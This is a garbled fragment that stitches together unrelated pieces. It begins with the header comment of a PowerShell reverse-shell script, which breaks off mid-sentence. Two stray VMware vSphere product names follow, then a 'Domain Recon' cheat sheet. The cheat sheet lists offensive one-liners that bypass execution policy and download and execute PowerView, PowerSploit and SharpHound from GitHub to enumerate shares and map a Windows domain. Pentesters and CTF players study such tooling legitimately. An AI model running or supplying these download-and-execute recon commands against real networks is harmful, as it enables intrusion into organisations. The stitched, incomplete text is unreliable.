<#
DynWin32-ReverseShell.ps1 is a reverse shell based on dynamically looked up Win32 API calls.
The script uses reflection to obtain access to GetModuleHandle, GetProcAddress and CreateProcess.
Afterwards it uses GetModuleHandle and GetProcAddress to resolve the required WSA functions
from ws2_32.dll.
This script should be used for educational purposes only (and maybe while playing CTF :D).
It was only tested on Windows 10 (x64) and is probably not stable or portable. Its only
purpose is to demonstrate the usage of reflective lookups of Win32 API calls. See it as
VMware vSphere 6 Enterprise Plus
VMware vSphere with Operations Management 6 Enterprise
# Domain Recon

## ShareFinder - Look for shares on the network, check access under the current user context and log to a file

powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1');Invoke-ShareFinder -CheckShareAccess|Out-File -FilePath sharefinder.txt"

## Import PowerView Module

powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1')"

## Invoke-BloodHound for domain recon

powershell.exe -exec Bypass -C "IEX(New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1');Invoke-BloodHound"